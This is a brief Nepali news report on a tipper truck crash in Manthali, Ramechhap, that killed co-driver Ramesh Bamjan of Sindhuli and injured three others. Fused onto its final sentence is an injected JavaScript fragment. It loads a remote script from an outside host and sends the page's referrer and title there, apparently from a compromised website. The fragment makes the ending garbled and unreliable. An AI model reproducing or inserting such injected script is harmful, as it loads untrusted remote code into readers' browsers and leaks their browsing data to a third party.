रामेछापमा टिपर दुर्घटना, सिन्धुलीका रमेशको मृत्यु

रामेछाप, पुस २७ । रामेछापमा टिपर दुर्घटना हुँदा एकजनाको ज्यान गएको छ ।
ना १ ञ ५७ नंको टिपर रामेछापको सदरमुकाम मन्थलीमा दुर्घटना हुँदा सहचालक सिन्धुलीको भद्रकालीका रमेश बम्जनको ज्यान गएको हो । आज बिहान भएको दुर्घटनामा तीनजना घाइते भएको जिल्ला प्रहरी कार्यालय रामेछापले जनाएको छ ।
दुर्घटनामा गम्भीर घाइते भएका चालक रमेश घिमिरेलाई उपचारका लागि काठमाडौँ पठाइएको छ । अरू दुईजनाको रामेछापमै उपचार भइरहेको छ । दुर्घटना सहचालकका कारण भएको प्रहरीले जनाएको छ ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;